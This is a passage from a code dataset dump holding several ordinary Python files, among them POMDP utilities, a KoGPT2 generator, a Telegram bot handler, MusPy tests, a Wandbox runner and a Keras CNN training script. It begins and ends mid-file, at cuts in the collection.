#print beliefs\n #print bestHyperplane\n return bestValue\n\n\ndef getMostLikelyDifficulty(belief, difficulties):\n numDiffs = len(difficulties)\n bestState = -1\n bestProb = 0\n for i in range(0, 2):\n for j in range(0, numDiffs):\n diff = difficulties[j]\n state = i * numDiffs + j\n if belief[state] > bestProb:\n bestState = diff\n bestProb = belief[state]\n return bestState\n\n\ndef updateBelief(prevBelief #action\n , observation, difficulties, gamma):\n newBeliefs = []\n numDiffs = len(difficulties)\n for i in range(0, 2):\n for j in range(0, numDiffs):\n #for k in range(0, numDiffs):\n diff = difficulties[j]\n state = (i * numDiffs) + j\n #if action == 0: #BALLOT A\n if observation == i:\n newBeliefs.append(calcAccuracy(gamma, diff) * prevBelief[state])\n else:\n newBeliefs.append((1 - calcAccuracy(gamma, diff)) * prevBelief[state])\n #else: #BALLOT B\n # if observation == i:\n # newBeliefs.append(calcAccuracy(bGamma, diffB) *\n # prevBelief[state])\n # else:\n # newBeliefs.append((1-calcAccuracy(bGamma, diffB)) *\n # prevBelief[state])\n newBeliefs.append(0.0)\n normalize(newBeliefs)\n return newBeliefs\n\n\ndef readPolicy(policyfile, numStates):\n policy = {}\n lines = open(policyfile, 'r').read().split(\"\\n\")\n\n numPlanes = 0\n action = 0\n alpha = [0 for k in range(0, numStates)]\n insideEntries = False\n for i in range(0, len(lines)):\n line = lines[i]\n #First we ignore a bunch of lines at the beginning\n if (line.find('#') != -1 or line.find('{') != -1 or\n line.find('policyType') != -1 or line.find('}') != -1 or\n line.find('numPlanes') != -1 or\n ((line.find(']') != -1) and not insideEntries) or\n line.find('planes') != -1 or line == ''):\n continue\n if line.find('action') != -1:\n words = line.strip(', ').split(\" => \")\n action = int(words[1])\n continue\n if line.find('numEntries') != -1:\n continue\n if line.find('entries') != -1:\n insideEntries = True\n continue\n if (line.find(']') != -1) and insideEntries: #We are done with one alpha vector\n if action not in policy:\n policy[action] = []\n policy[action].append(alpha)\n action = 0\n alpha = ['*' for k in range(0, numStates)]\n numPlanes += 1\n insideEntries = False\n continue\n #If we get here, we are reading state value pairs\n entry = line.split(\",\")\n state = int(entry[0])\n val = float(entry[1])\n alpha[state] = val\n\n return policy\n\n\n\n","sub_path":"ModelLearning/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"615827566","text":"import torch\nfrom transformers import GPT2LMHeadModel\nimport tokenizer\nfrom transformers import PreTrainedTokenizerFast\nimport sys\n\ntokenizer = PreTrainedTokenizerFast.from_pretrained(\"skt/kogpt2-base-v2\",\n bos_token='', eos_token='', unk_token='',\n pad_token='', mask_token='')\n\nmodel = GPT2LMHeadModel.from_pretrained('skt/kogpt2-base-v2')\n\nsents = ' '\ninputArgs = sys.argv\nfor i in range(1, len(inputArgs)):\n # i is a number, from 1 to len(inputArgs)-1\n text = sys.argv[i]\n sents = sents +' '+ text\n#text = '피부의 조직이 괴사된다면 '\ninput_ids = tokenizer.encode(sents)\ngen_ids = model.generate(torch.tensor([input_ids]),\n max_length=150,\n repetition_penalty=2.0,\n pad_token_id=tokenizer.pad_token_id,\n eos_token_id=tokenizer.eos_token_id,\n bos_token_id=tokenizer.bos_token_id,\n use_cache=True)\ngenerated = tokenizer.decode(gen_ids[0,:].tolist())\nprint(generated)","sub_path":"sentence_generation.py","file_name":"sentence_generation.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"8250031","text":"import traceback\n\nimport telegram\nfrom telegram import chataction\nfrom telegram.ext.dispatcher import run_async\n\nfrom mayday import LogConfig\nfrom mayday.constants import conversations, stages\nfrom mayday.constants.replykeyboards import ReplyKeyboards\nfrom mayday.features import search\nfrom mayday.helpers.quick_search_helper import QuickSearchHelper\nfrom mayday.utils import log_util\n\nquick_search_helper = QuickSearchHelper('quick_search')\nKEYBOARDS = ReplyKeyboards()\nflogger = LogConfig.flogger\n\n\n@run_async\ndef start(bot, update, user_data):\n try:\n telegram_info = update._effective_user\n callback_data = update.callback_query.data\n ticket = quick_search_helper.init_cache(user_id=telegram_info.id,\n username=telegram_info.username)\n\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data\n )\n flogger.info(msg)\n\n bot.edit_message_text(\n text=conversations.QUICK_SEARCH_START,\n chat_id=telegram_info.id,\n message_id=update.callback_query.message.message_id,\n reply_markup=KEYBOARDS.quick_search_start_keyboard_markup,\n parse_mode=telegram.ParseMode.MARKDOWN\n )\n return stages.QUICK_SEARCH_MODE_SELECTION\n except Exception:\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data,\n extra=str(update),\n trace_back=str(traceback.format_exc())\n )\n flogger.error(msg)\n\n\n@run_async\ndef select_mode(bot, update, user_data):\n try:\n telegram_info = update._effective_user\n callback_data = update.callback_query.data\n message = update.callback_query.message\n\n if callback_data == 'mainpanel':\n\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data\n )\n flogger.info(msg)\n\n bot.edit_message_text(\n chat_id=telegram_info.id,\n message_id=message.message_id,\n text=conversations.MAIN_PANEL_START.format_map({'username': telegram_info.username}),\n reply_markup=KEYBOARDS.actions_keyboard_markup,\n parse_mode=telegram.ParseMode.MARKDOWN\n )\n return stages.MAIN_PANEL\n\n if callback_data == 'cached_condition':\n\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data\n )\n flogger.info(msg)\n\n search.quick_search_start(bot, update, user_data)\n return stages.QUICK_SEARCH_LIST\n\n if callback_data == 'matching_my_ticket':\n if quick_search_helper.get_lastest_auth(telegram_info) is False:\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data='auth',\n error='banned'\n )\n flogger.warning(msg)\n\n update.message.reply_text(conversations.MAIN_PANEL_YELLOWCOW)\n return stages.END\n\n bot.send_chat_action(\n chat_id=telegram_info.id,\n action=chataction.ChatAction.TYPING\n )\n result = quick_search_helper.get_my_ticket_matching(user_id=telegram_info.id)\n\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data,\n rtn_ticket=result\n )\n flogger.info(msg)\n\n if result.get('status'):\n tickets = result.get('info')\n if (tickets and len(tickets) <= 25):\n bot.send_message(\n text=conversations.SEARCH_WITH_RESULTS,\n chat_id=telegram_info.id,\n message_id=message.message_id\n\n )\n traits = quick_search_helper.generate_tickets_traits(tickets)\n for trait in traits:\n bot.send_message(\n text=quick_search_helper.tickets_tostr(trait),\n chat_id=telegram_info.id,\n message_id=message.message_id\n )\n elif len(tickets) > 25:\n bot.edit_message_text(\n text=conversations.SEARCH_TOO_MUCH_TICKETS,\n chat_id=telegram_info.id,\n message_id=message.message_id\n\n )\n else:\n bot.edit_message_text(\n text=conversations.SEARCH_WITHOUT_TICKETS,\n chat_id=telegram_info.id,\n message_id=message.message_id\n\n )\n bot.send_message(\n text=conversations.AND_THEN,\n chat_id=telegram_info.id,\n message_id=message.message_id,\n reply_markup=KEYBOARDS.quick_search_start_keyboard_markup,\n\n )\n else:\n\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data,\n rtn_ticket=result\n )\n flogger.error(msg)\n\n bot.send_message(\n text=conversations.SEARCH_TICKET_ERROR,\n chat_id=telegram_info.id,\n message_id=message.message_id\n )\n query = quick_search_helper.get_cache(user_id=telegram_info.id, username=telegram_info.username)\n bot.send_message(\n text=conversations.QUICK_SEARCH_START,\n chat_id=telegram_info.id,\n message_id=update.callback_query.message.message_id,\n reply_markup=KEYBOARDS.quick_search_start_keyboard_markup,\n parse_mode=telegram.ParseMode.MARKDOWN\n )\n return stages.QUICK_SEARCH_MODE_SELECTION\n except Exception:\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data,\n extra=str(update),\n trace_back=str(traceback.format_exc())\n )\n flogger.error(msg)\n","sub_path":"mayday/features/quick_search.py","file_name":"quick_search.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"484660307","text":"\"\"\"Test cases for MusPy classes.\"\"\"\nfrom muspy import Music, Note, Track\n\n\ndef test_repr():\n note = Note(time=0, duration=1, pitch=60)\n assert repr(note) == \"Note(time=0, pitch=60, duration=1, velocity=64)\"\n\n\ndef test_from_dict():\n note = Note.from_dict({\"time\": 0, \"duration\": 1, \"pitch\": 60})\n assert note.time == 0\n assert note.duration == 1\n assert note.pitch == 60\n\n\ndef test_to_ordered_dict():\n note = Note(time=0, duration=1, pitch=60)\n ordered_dict = note.to_ordered_dict()\n assert ordered_dict[\"time\"] == 0\n assert ordered_dict[\"duration\"] == 1\n assert ordered_dict[\"pitch\"] == 60\n\n\ndef test_append():\n track = Track()\n track.append(Note(time=0, duration=1, pitch=60))\n track.append(Note(time=1, duration=1, pitch=60))\n assert len(track) == 2\n\n\ndef test_remove_invalid():\n notes = [\n Note(time=-1, duration=1, pitch=60),\n Note(time=0, duration=1, pitch=60),\n ]\n track = Track(notes=notes)\n track.remove_invalid()\n assert len(track) == 1\n\n\ndef test_remove_duplicate():\n notes = [\n Note(time=0, duration=1, pitch=60),\n Note(time=0, duration=1, pitch=60),\n ]\n track = Track(notes=notes)\n track.remove_duplicate()\n assert len(track) == 1\n\n\ndef test_sort_track():\n notes = [\n Note(time=2, pitch=64, duration=1),\n Note(time=0, pitch=60, duration=1),\n Note(time=1, pitch=62, duration=1),\n ]\n track = Track(notes=notes)\n track.sort()\n\n # Answers\n times = (0, 1, 2)\n pitches = (60, 62, 64)\n\n for i, note in enumerate(track):\n assert note.time == times[i]\n assert note.pitch == pitches[i]\n\n\ndef test_sort_music():\n notes = [\n Note(time=2, pitch=64, duration=1),\n Note(time=0, pitch=60, duration=1),\n Note(time=1, pitch=62, duration=1),\n ]\n music = Music(tracks=[Track(notes=notes)])\n music.sort()\n\n # Answers\n times = (0, 1, 2)\n pitches = (60, 62, 64)\n\n for i, note in enumerate(music.tracks[0]):\n assert note.time == times[i]\n assert note.pitch == pitches[i]\n","sub_path":"tests/test_classes.py","file_name":"test_classes.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"301896767","text":"#!/usr/bin/env python\r\n\r\nfrom communicatorv2 import *\r\nimport socket\r\nimport re\r\n\r\ncurrent_values = \"\"\r\nlist = []\r\nrunning = 1\r\nmessage = \"\"\r\nconfigreader = config_reader()\r\naccept_thread = acceptor(running, list, \"RSC\", configreader.addresses)\r\naccept_thread.setDaemon(True)\r\naccept_thread.start()\r\nold_values = 20 \r\n\r\n# Method to retrieve the list of range sensor values.\r\ndef range_module(datastring):\r\n if datastring == \"+\" or datastring == \"\":\r\n return current_values\r\n split = datastring.split(\"+\")\r\n range_values = split[1].replace('{Range ', '')\r\n range_values = range_values.replace('}', '')\r\n datasplit = range_values.split(',')\r\n for i in range(len(datasplit)):\r\n if float(datasplit[i]) < 0:\r\n return current_values\r\n range_values = split[0] + \"+\" + range_values\r\n return range_values\r\n\r\nwhile running:\r\n data = accept_thread.memory[2]\r\n string = data.split('\\r\\n')\r\n for i in range(len(string)):\r\n datasplit = re.findall('\\{[^\\}]*\\}|\\S+', string[i])\r\n if len(datasplit) > 6:\r\n if datasplit[2] == \"{Type RangeScanner}\":\r\n message = datasplit[1] + \"+\"\r\n message += datasplit[6]\r\n if message != \"\":\r\n current_values = range_module(message)\r\n if current_values != old_values: \r\n old_values = current_values \r\n\r\n message = \"\"\r\n if current_values != \"\":\r\n while len(accept_thread.request_data) != 0:\r\n command = \"RCV!RSC!\" + current_values + \"#\"\r\n configreader.connection(list, accept_thread.request_data[0]).send(\r\n command)\r\n accept_thread.request_data.pop(0)\r\n\r\n","sub_path":"final/distributed/rangescanner.py","file_name":"rangescanner.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"434694360","text":"# PyAlgoTrade\n# \n# Copyright 2012 Gabriel Martin Becedillas Ruiz\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n.. moduleauthor:: Gabriel Martin Becedillas Ruiz \n\"\"\"\n\nfrom pyalgotrade.barfeed import csvfeed\nfrom pyalgotrade import bar\n\nimport datetime\n\n######################################################################\n## NinjaTrader CSV parser\n# Each bar must be on its own line and fields must be separated by semicolon (;).\n#\n# Minute Bars Format:\n# yyyyMMdd HHmmss;open price;high price;low price;close price;volume\n#\n# Daily Bars Format:\n# yyyyMMdd;open price;high price;low price;close price;volume\n\nclass Frequency:\n\tMINUTE = 1\n\tDAILY = 2\n\nclass RowParser(csvfeed.RowParser):\n\t# zone: The zone specifies the offset from Coordinated Universal Time (UTC, formerly referred to as \"Greenwich Mean Time\") \n\tdef __init__(self, frequency, zone = 0):\n\t\tself.__frequency = frequency\n\t\tself.__zone = zone\n\n\tdef __parseDateTime(self, dateTime):\n\t\tret = None\n\t\tif self.__frequency == Frequency.MINUTE:\n\t\t\tret = datetime.datetime.strptime(dateTime, \"%Y%m%d %H%M%S\")\n\t\t\tret += datetime.timedelta(hours= (-1 * self.__zone))\n\t\telif self.__frequency == Frequency.DAILY:\n\t\t\tret = datetime.datetime.strptime(dateTime, \"%Y%m%d\")\n\t\telse:\n\t\t\tassert(False)\n\t\treturn ret\n\n\tdef getFieldNames(self):\n\t\treturn [\"Date Time\", \"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]\n\n\tdef getDelimiter(self):\n\t\treturn \";\"\n\n\tdef parseBar(self, csvRowDict):\n\t\tdateTime = self.__parseDateTime(csvRowDict[\"Date Time\"])\n\t\tclose = float(csvRowDict[\"Close\"])\n\t\topen_ = float(csvRowDict[\"Open\"])\n\t\thigh = float(csvRowDict[\"High\"])\n\t\tlow = float(csvRowDict[\"Low\"])\n\t\tvolume = float(csvRowDict[\"Volume\"])\n\t\treturn bar.Bar(dateTime, open_, high, low, close, volume, None)\n\nclass Feed(csvfeed.BarFeed):\n\t\"\"\"A :class:`pyalgotrade.barfeed.BarFeed` that loads bars from a CSV file exported from NinjaTrader.\n\n\t:param frequency: The frequency of the bars.\n\n\t.. note::\n\n\t\tValid **frequency** parameter values are:\n\n\t\t * ninjatraderfeed.Frequency.MINUTE \n\t\t * ninjatraderfeed.Frequency.DAILY\n\t\"\"\"\n\n\tdef __init__(self, frequency):\n\t\tcsvfeed.BarFeed.__init__(self)\n\t\tself.__frequency = frequency\n\n\tdef addBarsFromCSV(self, instrument, path, timeZone = 0):\n\t\t\"\"\"Loads bars for a given instrument from a CSV formatted file.\n\t\tThe instrument gets registered in the bar feed.\n\t\t\n\t\t:param instrument: Instrument identifier.\n\t\t:type instrument: string.\n\t\t:param path: The path to the file.\n\t\t:type path: string.\n\t\t:param timeZone: The timezone for bars. 0 if bar dates are in UTC.\n\t\t:type timeZone: int.\n\t\t\"\"\"\n\n\t\trowParser = RowParser(self.__frequency, timeZone)\n\t\tcsvfeed.BarFeed.addBarsFromCSV(self, instrument, path, rowParser)\n\n","sub_path":"pyalgotrade/barfeed/ninjatraderfeed.py","file_name":"ninjatraderfeed.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"42297097","text":"#!/usr/bin/env python\n#\n# runner.py\n#\n\n\"\"\"\nWandbox runner for Python\n\"\"\"\n\nimport sys\nimport os\nimport codecs\n\nfrom .wandbox import Wandbox\n\n\ndef text_transform(value):\n try:\n if isinstance(value, str):\n return value.decode()\n # elif isinstance(value, unicode):\n # return value.encode('utf_8')\n except:\n pass\n return value\n\n\nclass Runner:\n \"\"\"wandbox Runner class\"\"\"\n\n def __init__(self, lang, compiler, save, encoding, retry, retry_wait, prefix_chars='-'):\n self.wandbox = Wandbox()\n self.language = lang\n self.compiler = compiler\n self.wandbox.compiler(self.compiler)\n self.retry = retry\n self.retry_wait = retry_wait\n self.prefix_chars = prefix_chars\n self.encoding = encoding\n self.switches = None\n self.wandbox.permanent_link(save)\n\n @staticmethod\n def ShowParameter(response):\n r = response\n if 'compiler' in r:\n print('compiler:' + r['compiler'])\n if 'options' in r:\n print('options:' + r['options'])\n if 'compiler-option-raw' in r:\n print('compiler-option-raw:' + r['compiler-option-raw'])\n if 'runtime-option-raw' in r:\n print('runtime-option-raw' + r['runtime-option-raw'])\n if 'created-at' in r:\n print(r['created-at'])\n\n @staticmethod\n def ShowResult(r, stderr=False):\n if 'error' in r:\n print(r['error'])\n return 1\n if stderr:\n if 'compiler_output' in r:\n print('compiler_output:')\n print(text_transform(r['compiler_output']))\n if 'compiler_error' in r:\n sys.stderr.write(text_transform(r['compiler_error']))\n if 'program_output' in r:\n print('program_output:')\n print(text_transform(r['program_output']))\n if 'program_error' in r:\n sys.stderr.write(text_transform(r['program_error']))\n else:\n if 'compiler_message' in r:\n print('compiler_message:')\n print(text_transform(r['compiler_message']))\n if 'program_message' in r:\n print('program_message:')\n print(text_transform(r['program_message']))\n if 'url' in r:\n print('permlink: ' + r['permlink'])\n print('url: ' + r['url'])\n if 'signal' in r:\n print('signal: ' + r['signal'])\n\n if 'status' in r:\n return int(r['status'])\n return 1\n\n @staticmethod\n def GetSwitches(compiler, retry, wait):\n for d in Wandbox.Call(Wandbox.GetCompilerList, retry, wait):\n if d['name'] == compiler:\n if 'switches' in d:\n return d['switches']\n\n @staticmethod\n def GetDefaultOptions(compiler, retry, wait):\n opt = []\n for s in Runner.GetSwitches(compiler, retry, wait):\n if s['type'] == 'select':\n opt.append(s['default'])\n elif s['type'] == 'single':\n if s['default']:\n opt.append(s['name'])\n return opt\n\n def get_switches(self):\n if not self.switches:\n self.switches = Runner.GetSwitches(self.compiler, self.retry, self.retry_wait)\n return self.switches\n\n def build_options(self, user_options=None, disable_options=None, use_default=True):\n options = []\n if use_default:\n switches = self.get_switches()\n tmp = [] if user_options is None else user_options\n for s in switches:\n if s['type'] == 'select':\n target = s['default']\n candidate = [x['name'] for x in s['options']]\n for opt in tmp:\n if opt in candidate:\n target = opt\n tmp.remove(opt)\n break\n options.append(target)\n elif s['type'] == 'single':\n if s['default'] and (s['default'] in tmp):\n options.append(s['name'])\n elif user_options:\n options.extend(user_options)\n if disable_options:\n for dis in disable_options:\n if dis in options:\n options.remove(dis)\n self.wandbox.options(','.join(options))\n\n def build_compiler_options(self, options):\n codes = []\n for opt in options:\n if opt[0] in self.prefix_chars:\n self.wandbox.add_compiler_options(opt)\n else:\n if os.path.isfile(opt):\n codes.append(opt)\n else:\n self.wandbox.add_compiler_options(opt)\n main_filepath = codes[0]\n main_files = self.open_code(main_filepath, main_filepath)\n for k, v in main_files.items():\n if k == main_filepath:\n self.wandbox.code(v)\n else:\n self.wandbox.add_file(k, v)\n\n for filepath_ in codes[1:]:\n filepath = filepath_.strip()\n files = self.open_code(filepath, filepath)\n self.wandbox.add_compiler_options(filepath)\n for k, v in files.items():\n self.wandbox.add_file(k, v)\n\n def set_stdin(self, stdin):\n if stdin:\n self.wandbox.stdin(stdin)\n\n def set_runtime_options(self, commandlines):\n ro = '\\n'.join(commandlines)\n ro = ro.replace('\\\\n', '\\n')\n self.wandbox.runtime_options(ro)\n\n def run(self):\n return Wandbox.Call(lambda : self.wandbox.run(), self.retry, self.retry_wait)\n\n def dump(self):\n self.wandbox.dump()\n\n def file_open(self, path, mode):\n if self.encoding:\n file = codecs.open(path, mode, self.encoding)\n else:\n file = open(path, mode)\n return file\n\n def open_code(self, filepath, filename):\n if not os.path.exists(filepath):\n sys.stderr.write('error: {0}: No such file or directory\\n'.format(filepath))\n sys.exit(1)\n return self.make_code(filepath, filename)\n\n def make_code(self, filepath, filename):\n code = ''\n file = self.file_open(filepath, 'r')\n code = file.read()\n file.close()\n return {filename: code}\n","sub_path":"wandbox/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":6384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"427599967","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 22 09:30:58 2018\r\n\r\n@author: teranishis\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 21 11:41:37 2018\r\n\r\n@author: teranishis\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 14 14:35:19 2018\r\n\r\n@author: teranishis\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pickle\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom keras.models import Model\r\nfrom keras.layers import Input, Conv2D, Activation, MaxPool2D, BatchNormalization, Flatten, Dense, Dropout\r\nfrom keras.optimizers import Adam\r\nfrom keras.utils import np_utils\r\nfrom keras.utils import to_categorical\r\nfrom keras.utils import Sequence\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.callbacks import ReduceLROnPlateau, ModelCheckpoint\r\nfrom sklearn.model_selection import KFold\r\nimport keras.backend as K\r\nimport tensorflow as tf\r\n\r\nconfig = tf.ConfigProto(allow_soft_placement=True)\r\nconfig.gpu_options.allow_growth = True\r\nK.set_session(tf.Session(config=config))\r\n\r\n#画像の読み込み\r\n#学習用のデータを作る\r\nimage_list = []\r\nlabel_list = []\r\n\r\n# ./image/ 以下のディレクトリの画像を読み込む\r\nfor dir in os.listdir(\"./images\"):\r\n if dir == \".DS_Store\":\r\n continue\r\n \r\n dir1 = \"./images/\" + dir\r\n #フォルダ0のラベルは0、、、\r\n label = dir\r\n \r\n for file in os.listdir(dir1):\r\n #配列label_listに正解ラベルを追加\r\n label_list.append(label)\r\n filepath = dir1 + \"/\" + file\r\n #画像を読み込み、グレースケールに変換し、28x28pixelに変換し、numpy配列へ変換する\r\n #画像の1ピクセルはそれぞれ0-255\r\n image = np.array(Image.open(filepath).convert(\"RGB\").resize((150, 150)))\r\n #print(filepath)\r\n #さらにフラットな1次元配列に変換\r\n #image = image.reshape(1, 784).astype(\"float32\")[0]\r\n #出来上がった配列をimage_listに追加\r\n image_list.append(image)\r\n \r\n#kerasに渡すためにnumpy配列に変換\r\nimage_list = np.array(image_list)\r\nlabel_list = np.array(label_list)\r\n\r\n#クラスの形式を変換\r\nlabel_list = np_utils.to_categorical(label_list, 37)\r\n\r\n#学習用データとテストデータ\r\n#X_t, X_test, y_t, y_test = train_test_split(image_list, label_list, test_size = 0.3)\r\n#X_train, X_val, y_train, y_val = train_test_split(X_t, y_t, test_size = 0.2)\r\n\r\n#kfoldによる交差検証\r\nkf = KFold(n_splits=10, shuffle = True)\r\nindex = 0\r\nfor train_index, eval_index in kf.split(image_list):\r\n x_train, x_eval = image_list[train_index], image_list[eval_index]\r\n y_train, y_eval = label_list[train_index], label_list[eval_index]\r\n \r\n model_weights = \"./w/dog_cat_cnn_model[%d].h5\" % index\r\n index = index + 1\r\n \r\n # Data Augmentation\r\n datagen = ImageDataGenerator(\r\n rescale = 1./255,\r\n featurewise_center = True,\r\n featurewise_std_normalization = True,\r\n #rotation_range=20,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n channel_shift_range=50,\r\n horizontal_flip = True)\r\n validationgen = ImageDataGenerator(rescale=1./255)\r\n \r\n datagen.fit(x_train)\r\n validationgen.fit(x_eval)\r\n \r\n #モデル\r\n input = Input(shape=(150, 150, 3))\r\n X = Conv2D(64, (1, 1), padding = \"same\")(input)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = Conv2D(64, (3, 3), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = Conv2D(64, (3, 3), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = MaxPool2D((2, 2), padding = \"same\")(X)\r\n #X = Dropout(0.5)(X)\r\n\r\n X = Conv2D(128, (1, 1), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = Conv2D(128, (3, 3), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = Conv2D(128, (3, 3), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = MaxPool2D((2, 2), padding = \"same\")(X)\r\n #X = Dropout(0.5)(X)\r\n \r\n X = Conv2D(256, (1, 1), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = Conv2D(256, (3, 3), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = Conv2D(256, (3, 3), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = MaxPool2D((2, 2), padding = \"same\")(X)\r\n #X = Dropout(0.5)(X)\r\n \r\n X = Conv2D(512, (1,1), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = Conv2D(512, (3, 3), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = Conv2D(512, (3, 3), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = MaxPool2D((2, 2), padding = \"same\")(X)\r\n #X = Dropout(0.5)(X)\r\n \r\n X = Conv2D(512, (1,1), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = Conv2D(512, (3, 3), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = Conv2D(512, (3, 3), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = MaxPool2D((2, 2), padding = \"same\")(X)\r\n X = Dropout(0.5)(X)\r\n \r\n X = Flatten()(X)\r\n X = Dense(4096, activation = \"relu\")(X)\r\n #X = Dropout(0.5)(X)\r\n X = Dense(4096, activation = \"relu\")(X)\r\n X = Dropout(0.5)(X)\r\n #X = Dense(1000, activation = \"relu\")(X)\r\n #X = Dropout(0.5)(X)\r\n output = Dense(37, activation=\"softmax\")(X)\r\n \r\n model = Model(input, output)\r\n \r\n #コンパイル\r\n model.compile(optimizer=Adam(lr = 1e-4), loss = \"categorical_crossentropy\",\r\n metrics=[\"accuracy\"])\r\n #評価に用いるモデル重みデータの保存\r\n checkpointer = ModelCheckpoint(model_weights, monitor = \"val_loss\", verbose = 1,\r\n save_best_only = True)\r\n\r\n #フィット\r\n reduce_lr = ReduceLROnPlateau(monitor = \"val_loss\", factor = 0.5, patience = 10,min_lr = 0, verbose = 1)\r\n history = model.fit_generator(datagen.flow(x_train, y_train, batch_size = 40),\r\n steps_per_epoch = len(x_train) / 32, validation_data=validationgen.flow(x_eval, y_eval),\r\n epochs = 10, validation_steps = len(x_eval), callbacks = [reduce_lr, checkpointer], shuffle = True)\r\n #history = model.fit_generator(generator = train_gen, epochs = 1000, steps_per_epoch=len(X_train), \r\n # verbose = 1, validation_data = valid_gen, validation_steps = len(valid_gen))\r\n \r\nwith open(\"history.dat\", \"wb\") as fp:\r\n pickle.dump(history, fp)\r\n \r\n#モデルと重みを保存\r\njson_string = model.to_json()\r\nopen(\"dog_cat_cnn.json\", \"w\").write(json_string)\r\nmodel.save_weights(\"dog_cat_cnn.h5\")\r\n\r\n#モデルの表示\r\nmodel.summary()\r\n\"\"\"\r\n#評価\r\nscore = model.evaluate(X_test, y_test, verbose=0)\r\nprint(\"test loss:\", score[0])\r\nprint(\"test accuracy:\",score[1])\r\n\"\"\"\r\n#訓練時の損失値と正解率をプロット\r\nacc = history.history[\"acc\"]\r\nval_acc = history.history[\"val_acc\"]\r\nloss = history.history[\"loss\"]\r\nval_loss = history.history[\"val_loss\"]\r\nepochs = range(1, len(acc) + 1)\r\n\r\n#正解率をプロット\r\nplt.plot(epochs, acc, \"o\", label=\"Training acc\")\r\nplt.plot(epochs, val_acc, \"b\", label = \"Validation acc\")\r\nplt.title(\"Training and validation accuracy\")\r\nplt.legend()\r\n\r\nplt.figure()\r\n\r\n#損失値をプロット\r\nplt.plot(epochs, loss, \"bo\", label = \"Training loss\")\r\nplt.plot(epochs, val_loss, \"b\", label = \"Validation loss\")\r\nplt.title(\"Training and validation loss\")\r\nplt.legend()\r\n\r\nplt.show()\r\n\r\nhistory_dict = history.history\r\nhistory_dict.keys()","sub_path":"多クラス分類_多層_crossvalidation.py","file_name":"多クラス分類_多層_crossvalidation.py","file_ext":"py","file_size_in_byte":8006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"236681879","text":"# LRU CACHE\nclass 